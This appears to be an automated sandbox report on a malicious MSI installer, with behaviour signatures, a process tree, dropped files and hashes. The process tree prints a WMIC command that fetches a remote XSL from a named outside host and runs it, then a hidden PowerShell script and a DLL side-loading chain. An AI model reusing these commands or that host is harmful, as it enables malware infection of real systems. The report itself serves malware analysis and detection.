Overview

overview

10

Static

static

8

test/0b627...5b.doc

windows10_x64

10

test/0dded...66.doc

windows10_x64

10

test/91B5D...9D.msi

windows10_x64

8

test/ed01e...aa.exe

windows10_x64

10

test/fe9d7...8f.exe

windows10_x64

10

Analysis

  • max time kernel
    111s
  • max time network
    124s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    17-11-2021 14:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test/91B5DB3C0CCBD68BD04C24571E27F99D.msi

  • Size

    277KB

  • MD5

    91b5db3c0ccbd68bd04c24571e27f99d

  • SHA1

    b01cb4fe38315d41fcbe9c6278ebe4574496ab0d

  • SHA256

    ec85138598c57c6a6bdb5ed470614f582d3b5a8c6b243eb2f41b9970ea13d130

  • SHA512

    9f0b07f961625fcc06ee64fcfe5e35e0d40db81f75c3cbc584434c1925fac241db69cac3c1a1bf329d965a4df9bdaa53c13bb8ea3206e2c9d4facf7f74ba21b7

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 7 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test\91B5DB3C0CCBD68BD04C24571E27F99D.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2812
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 1FCFF782A8B7F921CBB119A3792D6826
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1280
      • C:\Windows\System32\Wbem\WMIC.exe
        "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:664
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
          4⤵
          • Blocklisted process makes network request
          • Drops startup file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1336
          • C:\Users\Admin\AppData\Roaming\vcyPK\nvsmartmaxapp.exe
            "C:\Users\Admin\AppData\Roaming\vcyPK\nvsmartmaxapp.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1340
            • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
              "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              6⤵
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:2360
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 90B5C0E413FE41B3938E300BDBD5F490
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Users\Admin\AppData\Local\Temp\lcB363.tmp
        "C:\Users\Admin\AppData\Local\Temp\lcB363.tmp"
        3⤵
        • Executes dropped EXE
        PID:1372

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Admin.ps1
    MD5

    9a362dd5fb8679b63ca3996098a903ff

    SHA1

    f86f4bdc36538c666ed60c7ad2091b9e07b6c7e3

    SHA256

    30cc11279f166a46236eb838391df9d0d93fda8e818755a6fbe6168d13c7e8fc

    SHA512

    d805eb926fd611cf81834d2f6fb27f025954365b636bc536c83247611106110dc404cbf96ce79ec96d76db443bcc24681903b786813e6ae407c1df7a59b71452

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\lcB363.tmp
    MD5

    55ffee241709ae96cf64cb0b9a96f0d7

    SHA1

    b191810094dd2ee6b13c0d33458fafcd459681ae

    SHA256

    64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

    SHA512

    01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\lcB363.tmp
    MD5

    55ffee241709ae96cf64cb0b9a96f0d7

    SHA1

    b191810094dd2ee6b13c0d33458fafcd459681ae

    SHA256

    64bc6cf6b6e9850cea2a36cabc88982b0b936dd7f0bc169a2f6dd2a5d1e86abf

    SHA512

    01d05a5f34be950ec660af9e1de5c7d3c0e473f7815c2e13157c0b7bf162ca5a6b34fabc3704ba6e4fb339a53b1a20862fe984e16feca81f45cf4a0f98e01c07

    Download Submit

  • C:\Users\Admin\AppData\Roaming\vcyPK\NvSmartMax
    MD5

    78ef53b2ad57536c74bbafece93a95e6

    SHA1

    4b23eb993a5853013911a0310c1cbb834500ba94

    SHA256

    371a793bdbe086871f1526000f878499b5fdd0426ffb6934745866483bbb6751

    SHA512

    182079daa43cf65d29d277274cdb78b3383a61a518237c65bf4dcc29ba71e147c425f097d4473fecd455f4f9ab44c316bf1e292d045529b167bb852cb1babe71

    Download Submit

  • C:\Users\Admin\AppData\Roaming\vcyPK\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit

  • C:\Users\Admin\AppData\Roaming\vcyPK\nvsmartmaxapp.exe
    MD5

    df3e0e32d1e1fb50cc292aebc5e5b322

    SHA1

    12c93bb262696314123562f8a4b158074c9f6b95

    SHA256

    6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412

    SHA512

    71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d

    Download Submit

  • C:\Users\Admin\AppData\Roaming\vcyPK\nvsmartmaxapp.exe
    MD5

    df3e0e32d1e1fb50cc292aebc5e5b322

    SHA1

    12c93bb262696314123562f8a4b158074c9f6b95

    SHA256

    6a1f91b94bc6c7167967983a78aa1c8780decad66c278e3d7da5e8d4dbec4412

    SHA512

    71008d9cdea4331202ef4d6b68e23ceae8173d27b0c5a2ee01c6effa50a430c656fbf408197d82b08e58d66a77883ac74ad5a2ede1da8e48c8a3b24c8817072d

    Download Submit

  • C:\Windows\Installer\MSIAF3C.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • C:\Windows\Installer\MSIB20C.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • C:\Windows\Installer\MSIB345.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • C:\Windows\Installer\MSIB47F.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • \Users\Admin\AppData\Roaming\vcyPK\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit

  • \Users\Admin\AppData\Roaming\vcyPK\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit

  • \Users\Admin\AppData\Roaming\vcyPK\NvSmartMax.dll
    MD5

    5b861438e716d7c47632c4922be36795

    SHA1

    499a5534020bd3ffa82097bf1edae7668367b6bc

    SHA256

    eb3514c05e4ad10610a1b2d5bb25565b01a577291b96c1d6122dec1acabc59c4

    SHA512

    9074e8bab59b1a45e44499389834503562f1b10b218d44b058e6d0c5643122fe5a2edfb369e00cc11b7c1ade39dd6e9f7df8547df192b2d68046adc6138118be

    Download Submit

  • \Windows\Installer\MSIAF3C.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • \Windows\Installer\MSIB20C.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • \Windows\Installer\MSIB345.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • \Windows\Installer\MSIB47F.tmp
    MD5

    9f1e5d66c2889018daef4aef604eebc4

    SHA1

    b80294261c8a1635e16e14f55a3d76889ff2c857

    SHA256

    02a81aea451cdfa2cd6668e3b814c4e50c6025e36b70ab972a8cc68aba5b3222

    SHA512

    8f8cbba79d2b6541e8b603a4a395cb938d77c358563bd745449bfee107ee64b88254a79ca5dd72fa05798a75c1464e7cca52556829f258009a3d33c9c3c5d39b

    Download Submit

  • memory/664-125-0x0000000000000000-mapping.dmp

    Download

  • memory/1280-124-0x0000029377770000-0x0000029377772000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1280-123-0x0000029377770000-0x0000029377772000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1280-122-0x0000000000000000-mapping.dmp

    Download

  • memory/1336-146-0x000001CA649C0000-0x000001CA649C1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1336-172-0x000001CA629E6000-0x000001CA629E8000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-142-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-143-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-144-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-145-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-200-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-147-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-148-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-149-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-150-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-151-0x000001CA64B70000-0x000001CA64B71000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1336-140-0x0000000000000000-mapping.dmp

    Download

  • memory/1336-153-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-161-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-162-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-166-0x000001CA629E0000-0x000001CA629E2000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-167-0x000001CA629E3000-0x000001CA629E5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-173-0x000001CA629E8000-0x000001CA629E9000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1336-141-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-174-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-175-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-197-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-198-0x000001CA4A270000-0x000001CA4A272000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1336-199-0x000001CA629E9000-0x000001CA629EF000-memory.dmp

    Filesize

    24KB

    Download

  • memory/1340-204-0x0000000000000000-mapping.dmp

    Download

  • memory/1340-216-0x00000000012F0000-0x0000000001313000-memory.dmp

    Filesize

    140KB

    Download

  • memory/1372-135-0x0000000000000000-mapping.dmp

    Download

  • memory/1548-128-0x0000000000020000-0x0000000000021000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1548-127-0x0000000000020000-0x0000000000021000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1548-126-0x0000000000000000-mapping.dmp

    Download

  • memory/1640-120-0x0000018412870000-0x0000018412872000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1640-121-0x0000018412870000-0x0000018412872000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2360-210-0x0000000000000000-mapping.dmp

    Download

  • memory/2360-215-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2812-119-0x00000196C9780000-0x00000196C9782000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2812-118-0x00000196C9780000-0x00000196C9782000-memory.dmp

    Filesize

    8KB

    Download